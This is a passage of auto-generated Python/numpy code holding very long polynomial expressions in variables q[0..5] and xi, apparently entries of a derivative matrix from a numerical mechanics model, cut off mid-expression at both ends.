0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)), (-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(60131984.3684659*xi**9*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*xi**10*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) + 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)), 0, 0, 0, 0, 0, 0, 0, 0, 0], [(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(-79.0123456790123*q[0, 0] - 79.0123456790123*q[1, 0] - 79.0123456790123*q[2, 0] - 35.5555555555555) + 22474.6227709191*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1522090.85432679*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 60131984.3684659*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (-12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3)*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(337119.341563786*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 31963907.9408627*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 1623563577.94858*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 51312626661.0909*(10*q[0, 0] - 5*q[1, 0] - 5*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 2844.44444444444*q[0, 0] + 1422.22222222222*q[1, 0] + 1422.22222222222*q[2, 0]) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-25283.9506172839*q[0, 0] + 12641.975308642*q[1, 0] + 12641.975308642*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 30441817.0865359*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 9621117498.95455*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 243534536.692287*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 3595939.64334705*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 25283.9506172839*q[0, 0]**2 + 25283.9506172839*q[0, 0]*q[1, 0] + 25283.9506172839*q[0, 0]*q[2, 0] - 25283.9506172839*q[1, 0]**2 + 25283.9506172839*q[1, 0]*q[2, 0] - 25283.9506172839*q[2, 0]**2 + 53.3333333333333) + 60131984.3684659*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 1522090.85432679*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 22474.6227709191*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 158.024691358025*q[0, 0]**2 + 158.024691358025*q[0, 0]*q[1, 0] + 158.024691358025*q[0, 0]*q[2, 0] - 158.024691358025*q[1, 0]**2 + 158.024691358025*q[1, 0]*q[2, 0] - 158.024691358025*q[2, 0]**2 + 1/3, 60131984.3684659*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1522090.85432679*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(-79.0123456790123*q[0, 0] - 79.0123456790123*q[1, 0] - 79.0123456790123*q[2, 0] - 35.5555555555555) + 22474.6227709191*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0] + q[1, 